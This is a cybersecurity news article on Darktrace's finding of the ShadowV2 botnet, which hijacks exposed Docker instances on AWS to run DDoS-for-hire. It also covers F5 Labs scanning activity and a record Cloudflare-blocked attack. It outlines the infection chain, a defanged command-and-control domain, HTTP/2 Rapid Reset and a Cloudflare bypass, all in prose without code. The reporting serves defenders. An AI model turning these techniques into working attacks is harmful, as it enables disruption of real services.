Redazione RHC : 24 September 2025 08:56
Amid growing criminal activity, Darktrace has uncovered a new campaign using the ShadowV2 botnet. Researchers detected malicious activity on June 24, 2025, when their honeypots were activated. This system relies on a Trojan horse written in Go that turns compromised Amazon Web Services cloud containers into fully-fledged nodes for DDoS attacks.
ShadowV2 is unique in that it exploits vulnerable Docker instances running on AWS EC2 virtual machines . The first step in the infection is the deployment of a helper container based on an Ubuntu image, which automatically installs the necessary tools.
Next, a separate container is created with a pre-compiled ELF executable file that communicates with the command and control server at “shadow.aurozacloud[.]xyz “. The malware regularly sends heartbeat messages and receives commands from this server, including instructions to launch attacks.
The botnet’s control infrastructure is built using the Python FastAPI framework and the Pydantic library . The system’s web interface includes a login module and a control panel for operators , allowing them to add and edit users, set attack parameters, and specify target and exception lists. All of this indicates that ShadowV2 is a ready-to-use platform for DDoS attacks using the ” pay-for-service” model.
Distributed attacks using ShadowV2 include advanced techniques. These include HTTP/2 Rapid Reset, an attack that can crash servers by repeatedly resetting high-speed connections, and bypassing Cloudflare’s Under Attack mode. This is implemented using the ChromeDP tool, which automatically resolves JavaScript activity and obtains bypass cookies.
However, the reliability of this method is questionable, as many security solutions detect and block headless browser behavior.
Additionally, ShadowV2 uses a separate deployment module, also written in Python. This component hijacks Docker daemons and then deploys a malicious container . This approach allows attackers to minimize their presence on compromised computers and hinder forensic analysis.
What’s particularly alarming is the entire architecture’s focus on extensibility and reusability: the control API not only allows for customized attacks, but also allows for massively scaling the infrastructure with full automation . ShadowV2 thus exemplifies a new generation of cybercrime, where malicious tools increasingly resemble legitimate SaaS products in terms of convenience and scalability .
Following this incident, F5 Labs reported another wave of activity: a botnet using browser headers disguised as Mozilla is conducting a massive internet scan for known vulnerabilities. In total, over 11,000 different user-agent strings associated with Mozilla-based browsers were detected.
Meanwhile, Cloudflare released its own report announcing the automatic blocking of the largest DDoS attack ever recorded. The recorded impact reached 22.2 Tbps with a peak of 10.6 billion packets per second . The attack lasted only 40 seconds, but its intensity set a new record in the history of cyber threats.
All of these events highlight the trend toward increasingly sophisticated attack tools and the growth of the “cybercrime-as-a-service” industry . Modern botnets like ShadowV2 are developed with scalability, functionality, and ease of use in mind, even for technically inexperienced clients.
Redazione